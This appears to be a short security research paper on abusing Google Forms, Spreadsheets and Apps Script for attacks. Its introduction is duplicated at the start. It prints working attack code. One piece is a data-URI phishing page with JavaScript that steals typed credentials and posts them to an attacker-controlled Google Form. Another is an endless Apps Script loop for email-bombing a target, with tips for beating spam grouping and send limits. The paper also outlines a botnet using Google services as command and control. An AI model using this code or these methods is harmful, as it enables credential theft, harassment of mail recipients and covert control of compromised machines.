Google Apps is a cloud-based productivity suite used by a large section of people
including Corporate, Academic and Home users. This paper is about abusing innocent
Google Apps and Data API to implement offensive attacks. The major and widely used
Google Apps like Google Forms, Google Spreadsheet and Google Script as well as the
Google Apps API can be abused for implementing various attack vectors. This paper
will look into the following things:
1. Phishing with Data URI and Google Forms.
2. E-mail Bombing regenerated with Google App Script.
3. Implementing a Cross-Platform Botnet with its C&C hosted with Google.
Abusing Google Apps and Data API: Google is My Command and Control Center
1. Abusing Google Apps: Google is my
Command and Control Center
Ajin Abraham
ajin25@gmail.com
www.opensecurity.in
INTRODUCTION
Google Apps is a cloud-based productivity suite used by a large section of people
including Corporate, Academic and Home users. This paper is about abusing innocent
Google Apps and Data API to implement offensive attacks. The major and widely used
Google Apps like Google Forms, Google Spreadsheet and Google Script as well as the
Google Apps API can be abused for implementing various attack vectors. This paper
will look into the following things:
1. Phishing with Data URI and Google Forms.
2. E-mail Bombing regenerated with Google App Script.
3. Implementing a Cross-Platform Botnet with its C&C hosted with Google.
ABUSING DATA URI AND GOOGLE FORMS
Data URI is a URI scheme that allows a web developer to include inline code into
webpages. These codes are executed as if they were from external sources. It was
discovered before and discussed in klevjers’s paper about Data URI that by abusing
Data URI and URL Shortners, hackers can implement a brand new phishing attack. The
data URI may looks like the following.
data:text/html,<title>Login</title><p align="center">Email:<input
type="text"><br>Password:<input type="text"><br><input type="submit"
value="Log in">
So this piece of code will get executed once you provide this in the URL field of a
browser.
One could easily use an URL Shortner service to shorten the data URI.
We are utilizing this previous knowledge to implement Hostless Phishing.
Hostless Phishing means the phisher is hosted nowhere as such. However one can say
2. that the source code is stored in the URL Shortner’s database. We will do some
workarounds to bypass the URL length restrictions enforced by the browsers. We use a
bit of AJAX and Google Forms to implement this. We will inject the following AJAX which
will capture all the keystrokes and send them to a Google Form and the data is logged
in the attached Spreadsheet.
<script>
function steal()
{
var us = document.fb.email.value;
var ps = document.fb.pass.value;
var http=new XMLHttpRequest();
var url = "<form_action>";
var params = "<text_field>=USERNAME: "+us+" PASS: "+ps;
http.open("POST", url, true);
http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
http.send(params);
sleep(1000);
}
function sleep(milliseconds) {
var start = new Date().getTime();
for (var i = 0; i < 1e7; i++) {
if ((new Date().getTime() - start) > milliseconds){
break;
}
}
}
</script>
So the final PoC will be include a genuine page’s source code, injected with a
Keylogging AJAX and this source is base encoded and crafted as a DATA URI and
finally URL shortened.
EMAIL BOMBING WITH GOOGLE APPSCRIPT
A single line of code inside a loop is required to start an Email Bombing with Google
App Script. App Script is much alike or almost like native Java Script with addition
classes to support Google Apps. To send a mail with a Google App Script you can use a
single line of code.
MailApp.sendEmail(‘to’,’subject’,’message’);
So simply you can put it inside a loop to perform an Email bombing. But since the mail
contents are all the same, in most of the modern email apps, all the similar mails are
3. stored under one email entry inbox, followed by the number of new mails. It forms a
hierarchical structure rather than separate new email entry.
In order to bypass that, we will send a mail with varying content each time. The
following code can do the needful.
sub=1;
msg=2;
while(1)
{
MailApp.sendEmail(“someone@somewhere.com”,sub,msg);
sub++;
msg++;
}
So this simple script can cause an Email Bombing the targeted email address. To
prevent this Google has applied a limit to the no of emails that can be send from an
account. But still you can run the script from multiple accounts, making it more
effective. It is observed that 98% of the messages are entering the email inbox rather
than ending up as Spam since the email headers are genuine, not caught by the spam
filters and obviously because they not blacklisted by the filters.
ABUSING GOOGLE API TO CONVERT GOOGLE APPS AS THE COMMAND AND CONTROL
CENTER FOR A BOTNET.
Xenotix xBOT is a powerful cross platform (Linux, Windows, Mac) bot written in
Python that abuse certain Google Services to implement Command & Control
Center for the botnet. The Google Apps Data API, Google Forms and Google
Spreadsheet is abused to implement C2 for a bot network. The Google Forms can
act as the C2 for a bot network. All the entries to the Google Form are send to an
attached Spreadsheet. Here we can implement a bot that will listen to the
Google Data API URL and extract the commands and later send back the
4. response via the same Form. The Google Data API allows us to fetch the contents
of a published spreadsheet in a variety of formats. The spreadsheet feeds are
fetched in RSS format and will parsed. For implementing the bot we will parse
through the source, fetch the commands and do the corresponding operations.
Fig1: Sample of Spreadsheet Feeds with commands and responses.
The xBOT's communication is encrypted as it uses Google's own SSL connection
and is nowhere affected by any firewalls or the ISP's tricky network
configurations. The botnet's commands and responses are encrypted making it
harder to sniff the bot’s communications. This Bot will be a prototype bot with
the bare minimum features of a Typical Bot. The intention of the paper is to give
an idea about how Google API’s can be abused for Botnet Implementation.
xBOT will be capable of performing operations like shell command execution,
downloading and uploading files, screen capturing, port scanning etc.
References
https://developers.google.com/gdata/samples?hl=en
https://developers.google.com/apps-script/
http://klevjers.com/papers/phishing.pdf